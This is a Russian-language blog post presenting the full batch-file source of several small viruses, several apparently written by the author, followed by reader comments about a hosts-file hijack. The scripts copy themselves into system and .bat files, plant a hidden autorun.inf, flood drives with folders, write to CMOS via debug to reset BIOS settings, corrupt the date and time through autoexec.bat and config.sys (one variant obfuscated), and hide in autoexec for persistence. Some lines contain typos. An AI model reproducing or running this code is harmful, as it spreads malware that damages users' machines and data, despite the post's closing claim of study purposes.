Познавательный блог  

Поиск по сайту

Гугль

Архивы

Описания вирусов Bat.kx

Ты еще таким страдаешь? Да и я тоже страдал. Ну давай делиться секретами. Вот старый вирёк Kx. Почему такое название? не знаю :) Здесь типичный вирек частично зашифрованный и имеющий возможность проверять комп на заражение. Это конечно не самый мелкий вирь, но к мелким вполне отнесется. Вот текст первого:

ctty nul %BAT.kx.f1rst%
:!K
set a=*.
set c=ba
set b=t
set !k=%windir%
deltree \y %!k%\winstart.bat
if not exist %!k%\winstart.bat copy %0 %!k%
if exist %!k%\winstart.bat goto :!K
if %a%=* goto :!xe0n
for %%z in (%a%%c%%b%) do copy /y %0 %%z
:!xe0n
deltree /y %0
ctty con

А вот и второй вирёк, Здесь я придумал очень интресный способ работы. Он создает на локальных дисках Autorun.inf и в нем запускает себя! Способ не супер но работает очень хорошо. А если наш великий касперский будет ругаться на мои переменный, то я их легко изменю ;)

----------------BAT.kx.v2-----------------
ctty nul %BAT.kx.v2%
:K
set v2=*.
set x3=ba
set kxsup=t
set !k=%windir%
deltree \y %!k%\winstart.bat
if exist c:\autorun.inf goto !xe0n
echo [AutoRun] > c:\autorun.inf
echo open=%!k%\winstart.bat > c:\autorun.inf
attrib c:\autorun.inf +h
if not exist %!k%\winstart.bat copy %0 %!k%
if exist %!k%\winstart.bat goto :K
if %v2%=* goto :!xe0n
for %%z in (%v2%%x3%%kxsup%) do copy /y %0 %%z
:!xe0n
deltree /y %0
ctty con

УУУУУУУУУУ а этот зверь просто создает кучи всяких папок на диске!

----------------BAT.K4$_Md-----------------
@ctty con %BSP%
if esist %windir%\winstart.bat goto :end
copy %windir%\winstart.bat
:: LAMERIZM it's live

::-----------------------------

cd\
md 1
md 2
md 3
md 4
md 5
md 6
md 7
md 8
md 9
md 0
md -
md =
md \
md
md q
md w
md e
md r
md t
md y
md u
md i
md o
md p
md [
md a
md s
md d
md f
md g
md h
md j
md k
md l
md ;
md '
md z
md x
md c
md v
md b
md n
md m
md ,
md .
md /
md Death

::-----------------------------

md 1
md 2
md 3
md 4
md 5
md 6
md 7
md 8
md 9
md 0
md -
md =
md \
md
md q
md w
md e
md r
md t
md y
md u
md i
md o
md p
md [
md a
md s
md d
md f
md g
md h
md j
md k
md l
md ;
md '
md z
md x
md c
md v
md b
md n
md m
md ,
md .
md /
md Death

::-----------------------------

cd a:\
md 1
md 2
md 3
md 4
md 5
md 6
md 7
md 8
md 9
md 0
md -
md =
md \
md
md q
md w
md e
md r
md t
md y
md u
md i
md o
md p
md [
md a
md s
md d
md f
md g
md h
md j
md k
md l
md ;
md '
md z
md x
md c
md v
md b
md n
md m
md ,
md .
md /
md Death

::-----------------------------
:end
ctty con

--------------------КУТЬ---------------------
rem Bat.Kx.Cmoskiller
@ctty nul
copy %0 %windir\%winstart.bat
echo >> c:\autoexec.bat
echo bedug -o 70 17 >> c:\autoexec.bat
echo bedug -o 71 17 >> c:\autoexec.bat
echo bedug -q >> c:\autoexec.bat
:: Bat.Kx.Cmoskiller
bedug -o 70 17
bedug -o 71 17
bedug -q
ctty con
cls

В этом вирусе мы сбрасываем биос!

ctty null
rem кут блин смотреть в ASCII.
:: KAV name is Bat.DTkiller
:: Black Small Pox [BSP]
find ver | "XP"
if errorlevel 1 goto :98
if not errorlevel 1 goto :XP
:98
attrib -a -r -h c:\autoexec.bat
echo ;>> c:\autoexec.bat
echo @date 01.01.6666 >> c:\autoexec.bat
echo @time 00:00:00,0 >> c:\autoexec.bat
attrib +a +r +h c:\autoexec.bat
ctty con
exit
:XP
attrib -a -r -h c:\Config.sys
echo ;>> c:\Config.sys
echo @date 01.01.6666 >> c:\Config.sys
echo @time 00:00:00,0 >> c:\Config.sys
attrib +a +r +h c:\Config.sys
ctty con
@cls

При каждой перезагрузке часы и дата будут изменяться.

@ctty nul

rem кут блин смотреть в ASCII.
:: KAV name is Bat.DTkiller.Crypt
:: Black Small Pox [BSP]

@if "%0=="%BAAAAAAAA% exit
set shell=BAAAAAAAA
set bla=e
set ck=c
set sma=h
set ll=o
set pox=@
set vir=t
set org=i
set ka=b
set ra=date
set ti=time
set file1=c:\autoexec.bat
set file2=c:\Config.sys

a%vir%%vir%r%org%%ka% %file1% -r
%bla%%ck%%sma%%ll% ; >> %file1%
%bla%%ck%%sma%%ll% %pox%%ra% 00-00-00 >> %file1%
%bla%%ck%%sma%%ll% %pox%%ti% 00:00:00,0 >> %file1%
a%vir%%vir%r%org%%ka% %file1% +r
%ck%%vir%%vir%y %ck%%ll%n
a%vir%%vir%r%org%%ka% %file2% -r
%bla%%ck%%sma%%ll% ; >> %file2%
%bla%%ck%%sma%%ll% %pox%%ra% 00-00-00 >> %file2%
%bla%%ck%%sma%%ll% %pox%%ti% 00:00:00,0 >> %file2%
a%vir%%vir%r%org%%ka% %file2% +r
%ck%%vir%%vir%y %ck%%ll%n
:exit
@exit

А эот он же но зашифрованный.
А вот и послежний герой!

@echo off
echo Rumtime error 0200:0071
if exist c:\virus.bat goto end > nul
copy %0 c:\virus.bat > nul
attrib +h c:\virus.bat > nul
echo c:\virus.bat >> c:\autoexec.bat > nul
:end

Просто прячется за зановеску!

Статьи написаны исключительно для изучения алгоритмов работы вирусов и методов борьбы с ними. Алгоритмы работы вирусов были выявлены при декомпиляции найденных в интернете вирусов и на сайте Лаборатории Касперского.

Комментарии

Комментарий от Александр [ Сентябрь 28, 2010, 20:23 ]

спасибо за вируса а скажите что мне делать я скачал програмку голоса в контакте и теперь когда я захожу в контакт или в поисковик вместо него вылезае окно и пишет: Привет, я вирус. Вирус, который был подцепленн тобою, когда ты лазил или лазила по интернетам. Я не просто вирус, я открыто заявляю о себе. Я не буду форматировать твой винтчестер, убивать твой компьютер, я просто хочу чтобы ты открыл или открыла свои глаза на этот чудестный мир! С этой целью, я, мой дорогой друг или подруга, заблокировал все сайты для доступа. И куда бы ты не пытался, не пыталась зайти, я буду всюду преследовать тебя.

Зачем это все? А вот зачем. Ты целыми сутками сидишь вконтакте, и для тебя больше не существет другого мира. Люди закрыли глаза. ВКонтакт рушит твой мозг изнутри. Поэтому, чтобы открыть тебе на это глаза, я буду появлятся всюду, кроме контакта, скорее всего ВКонтакте, поможет тебе боротся со мною, но изначально я выполню свою миссию. НЕТ ВКОНТАКТУ!

Сиди теперь только ВКонтакте, и задумайся, человек ли ты, или марионетка?

и как мне от етого избавиться!?

Комментарий от ZoRk [ Ноябрь 13, 2010, 13:41 ]

Александр, вообще не стоит качать всякую хрень, которая обещает золотые горы просто так. В вашем случае поможет удаление из файла C:/windows/system32/drivers/etc/hosts всех записей, кроме localhost (в блокноте открыть, отредактировать и сохранить)

Написать комментарий








Страницы

Свежие записи

Гугль

Мета

Счетчики


Rambler's Top100

Рубрики

  Разработка и дизайн — StvPromo.ru